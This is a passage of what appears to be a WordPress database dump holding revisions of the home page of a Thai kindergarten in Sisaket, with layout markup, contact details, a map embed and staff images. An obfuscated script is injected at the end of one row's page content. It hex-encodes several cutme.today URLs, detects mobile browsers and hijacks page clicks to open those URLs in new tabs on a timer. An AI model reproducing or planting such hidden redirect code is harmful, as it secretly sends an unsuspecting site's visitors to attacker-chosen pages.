{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 14:47:27','2025-06-27 07:47:27','',19,'http://watprato.ssk.in.th/?p=567',0,'revision','',0),
(568,1,'2025-06-27 14:48:06','2025-06-27 07:48:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 